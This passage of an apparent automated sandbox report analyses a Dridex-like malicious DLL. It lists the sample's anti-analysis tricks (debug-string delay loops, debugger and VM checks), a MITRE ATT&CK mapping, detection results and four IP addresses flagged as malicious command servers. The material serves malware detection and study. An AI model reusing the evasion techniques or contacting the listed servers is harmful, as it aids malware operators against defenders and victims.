Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1186

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1186

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E710730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6E710730

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: WerFault.exe, 00000005.00000003.688241826.0000000004F41000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <arg nm="proclsp" val="2195" />
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000005.00000003.690151958.0000000004F42000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000002.698634468.0000000004F42000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWH=
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000005.00000002.698763311.0000000004F7F000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.690108064.0000000004F7F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E706D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E706D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E713138 RtlAddVectoredExceptionHandler,

0_2_6E713138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1057946372.0000000001300000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.668105044.0000000003540000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.665553158.0000000003540000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1057946372.0000000001300000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.668105044.0000000003540000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.665553158.0000000003540000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1057946372.0000000001300000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.668105044.0000000003540000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.665553158.0000000003540000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1057946372.0000000001300000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.668105044.0000000003540000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.665553158.0000000003540000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E706D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6E706D0C

Source: Amcache.hve.5.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	Input Capture1	Security Software Discovery31	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	18%	Virustotal		Browse
SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	26%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.rundll32.exe.ba0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6e700000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.2.rundll32.exe.6e700000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.a40000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6e700000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.6e700000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.2.rundll32.exe.ba0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.ba0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.5.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.666345580.000000006E71F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544197
Start date:	22.12.2021
Start time:	20:36:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 53.8% (good quality ratio 51.4%) Quality average: 78.8% Quality standard deviation: 27.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.189.173.21 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_ec956fef9dabf4719f57ed463929b5a2167ca669_82810a17_1b64c96e\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9235792918556596
Encrypted:	false
SSDEEP:	192:Hgyix0oX7/HBUZMX4jed+R/u7sCS274ItWc:Di/X7/BUZMX4jes/u7sCX4ItWc
MD5:	FC092A755927F7FB196190805F465715
SHA1:	2AC3F6E6673E7670FCE801ED0820EE32D3120276
SHA-256:	1A40899BE4A975B17148FF0B9CE22C8C13389663499173A7AD7A9CAC46EF243C
SHA-512:	0966E17E17AB0D8C33538032570006B7B00880F61AF3E54BB7DBE89A8576C0B6EED289D9A616F7DE76C9C1B6F07A66C52A89B2CDA8DF71E2305F00D9BFE4720F
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.6.7.5.4.6.3.8.8.2.7.7.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.6.7.5.4.7.0.0.3.9.0.0.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.e.4.8.b.7.a.-.3.d.4.3.-.4.3.d.2.-.8.6.4.3.-.0.6.9.9.1.b.7.5.e.b.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.6.9.a.a.a.9.-.c.d.9.a.-.4.2.6.1.-.b.8.8.8.-.1.4.9.8.4.c.4.6.e.6.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.e.4.-.0.0.0.1.-.0.0.1.b.-.e.0.0.2.-.6.d.6.0.6.b.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB57.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 22 19:37:45 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	40152
Entropy (8bit):	2.2005856897512164
Encrypted:	false
SSDEEP:	192:ynjI9OK6eQO5Skb/bX9HUTOfFNNPJEXVtTBj9/pyRn:kTc5Lb/bjoX1j9/wR
MD5:	DE794CB3009E8F88013CA58667F948F7
SHA1:	865AE5B19BB10D2EE7CDEFD828817ED2EA76951F
SHA-256:	259DEC3D8B355579D5CF80AE49C6DD3659CDA7EC4040AE1E097112D5FFEEF982
SHA-512:	8C182828BD7B788164EA31F0924EC36FB83F963F0293BFAD18B7F07272C1F32AFC399ABDD637BB621121F4B7CFD34CEE9DE38532B49E264229FAA1BA552979C1
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........~.a............d...............l............*..........T.......8...........T...........@...............l...........X....................................................................U...........B..............GenuineIntelW...........T............~.a.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB356.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.6975014167210993
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNidB6/96Y986vgmfTTS6+prI89b+UsfSqm:RrlsNib6V6Ym6vgmfTTSz+Hfm
MD5:	F3C6E33D3022626D3C393EC9A2317434
SHA1:	4A9115CA377BB8A9ED6B1E5DA79C2CBD891340F4
SHA-256:	93D78D1669E1FB29AE2876AED3A484615EF1F9D0D3443F149E372964B922D2A6
SHA-512:	7B0A7C6838D483D62B7ADCF7826BB6F8638E3C7AF93F3CF6C8597FF85492B38ECF24AC9AD8ECBFC20C69BB014BA4BC18F9312733EF4B5ECFFE6A33B4A98C2EB0
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.4.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5B9.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4710
Entropy (8bit):	4.498226756879163
Encrypted:	false
SSDEEP:	48:cvIwSD8zsZJgtWI9zLWSC8B38fm8M4JCdswOhFz+q8/9UBgiT4SrSVd:uITfr06SNaJ3aiTDWVd
MD5:	BBA4EA3158A563DE73FBE4511BAC4894
SHA1:	5E62581B07F03D9FE618AC54C4975C13FF9F2AA8
SHA-256:	4C34C446850D96801BE53C1E6AC8B274B3CDFBF80EF4A8A254DB0835512616D7
SHA-512:	20AD63F49D5E574A3BA4070DC58448DF6BBF2EF4D06A5C9207B00EBFB48ED3081BA91967CFDEBFD708A2705A3EE1F149FD74C6C3431953F089E73706B274DB34
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309248" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
